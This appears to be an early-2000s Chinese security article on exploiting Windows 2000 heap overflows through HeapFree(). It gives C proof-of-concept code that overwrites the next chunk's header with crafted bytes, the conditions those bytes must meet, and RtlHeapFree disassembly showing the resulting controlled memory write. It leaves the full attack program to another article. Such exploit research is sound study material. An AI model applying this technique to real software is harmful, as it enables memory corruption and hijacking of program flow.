Windows下的Heap溢出的文章现在并不多，isno写过一篇，我看了受益匪浅，但他实现的利用方法是
“假设我们分配完buf1之后向其中拷贝内容，拷贝的内容大小超过buf1的大小，即16字节，就会发生溢
出，当如果我们覆盖掉了那两个4字节的指针，而下一次分配buf2之前又没有把buf1释放掉的话，那么就
会把一个4字节的内容写入一个地址当中，而这个内容和地址都是我们能够控制的，这样我们就可以控制
函数的流程转向我们的shellcode了”，我下面描述另外一种利用方法，也算是给isno的那篇文章做一点
补充。
         在Windows下也是可以像Linux下那样用free()对Heap溢出进行利用，在Windows下用HeapAlloc()函数
分配内存后的内存和映象和结构我就不说了，可以看isno的文档，在HeapAlloc()分配完内存后，每一块
内存的前面都包含一个8字节的管理区，这个管理区应该是下面的样子：

0 4 5 6 8
|不祥|Field|Flags|不祥|


        这8个字节用于HeapFree时使用，假设我们分配2个32字节的内存，当向第一个32字节内存填充达38字
节内容时，这时，覆盖了第二个32字节内存的管理区的6个字节，如果这6个字节经过我们精心设计，我们
时可以控制程序的流向的。
下面代码演示分配2个32字节的内存，在调用HeapFree时发生错误：

#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <malloc.h>

int main (int argc, char *argv[])
{
HANDLE hHeap;
char *buf1, *buf2;

//一个32字节的缓冲区
char mybuf[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";


//在进程的默认HEAP当中分配内存
hHeap=GetProcessHeap();

//分配两块32字节内存
buf1 = HeapAlloc(hHeap, 0, 32);
buf2 = HeapAlloc(hHeap, 0, 32);

//把32字节的mybuf拷贝到16字节的buf1里面
strcpy(buf1,mybuf);

//更改管理结构
memset(buf1+32,0x99,1);
memset(buf1+32+5,0xff,1);

//释放内存
HeapFree(hHeap, 0, buf1);
//这里会出错
HeapFree(hHeap, 0, buf2);

return 0;
}


当程序在内存未释放前，内存映象是这样的：

0 32 40
|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|0x99,0x00,0x05,0x00,0x00,0xff,0xxx,0xxx|

我们可以看到，管理区的前6个字节被我们改写了

第一个字节：必须大于0x80，我们改成0x99
第四个字节：必须小于0x40
第五个字节：第0和第3位必须置位，例如可以改成0x09，我们这里改成0xFF

我们可以分析_RtlHeapFree()的反汇编代码，这样可以知道为什么要这样改：

77FC9C97 mov al,byte ptr [esi+5]
77FC9C9A test al,1 //检查管理区的第5字节的第0位是否置位
77FC9C9C je 77FC9019
77FC9CA2 test dl,7
77FC9CA5 jne 77FC9019
77FC9CAB cmp byte ptr [esi+4],40h //检查管理区的第4字节是否小于0x40
77FC9CAF jae 77FC9019
77FC9CB5 or dword ptr [ebp-4],0FFh
77FC9CB9 mov ecx,dword ptr [edi+580h]
77FC9CBF test ecx,ecx
77FC9CC1 je 77FC9D03
77FC9CC3 cmp dword ptr [edi+584h],0
77FC9CCA jne 77FC9D03
77FC9CCC test al,8 //检查管理区的第5字节的第0位是否置位
77FC9CCE jne 77FC9D03
77FC9CD0 movzx eax,word ptr [esi]
77FC9CD3 mov dword ptr [ebp-30h],eax
77FC9CD6 cmp eax,80h //检查管理区的第1字节的是否大于0x80
77FC9CDB jae 77FC9D03 //我们需要跳到这个地址
77FC9CDD push edx
77FC9CDE lea eax,[eax+eax*2]
77FC9CE1 shl eax,4
77FC9CE4 add eax,ecx
77FC9CE6 push eax
77FC9CE7 call 77F89846
77FC9CEC test al,al
77FC9CEE je 77FC9D03
77FC9CF0 mov al,1
77FC9CF2 mov ecx,dword ptr [ebp-10h]
77FC9CF5 mov dword ptr fs:[0],ecx
77FC9CFC pop edi
77FC9CFD pop esi
77FC9CFE pop ebx
77FC9CFF leave
77FC9D00 ret 0Ch

用release方式编译上面代码运行，弹出如下窗口：0x77fca200指令引用的0x41414141内存不能为written。

这个41414141在那里呢？我们用softice跟踪可以发现如下代码：

77FCA1EF add esi,-18h //这时esi指向管理区的入口处，也就是buf1-18h处
（这个18在不同的版本的Windows 2000上是不一样的，请根据不同的Windows 2000版本处理），那里正是我们可以控制的
77FCA1F2 mov dword ptr [ebp-64h],esi
77FCA1F5 mov eax,dword ptr [esi]
77FCA1F7 mov dword ptr [ebp-68h],eax
77FCA1FA mov esi,dword ptr [esi+4]
77FCA1FD mov dword ptr [ebp-6Ch],esi
77FCA200 mov dword ptr [esi],eax //写内存，发生错误
77FCA202 mov dword ptr [eax+4],esi

有了上面的基础，我们就可以利用HeapFree()函数了，^_^
至于具体攻击程序的编写，请参考isno写的文章《Windows下的HEAP溢出及其利用》，方法是一样的。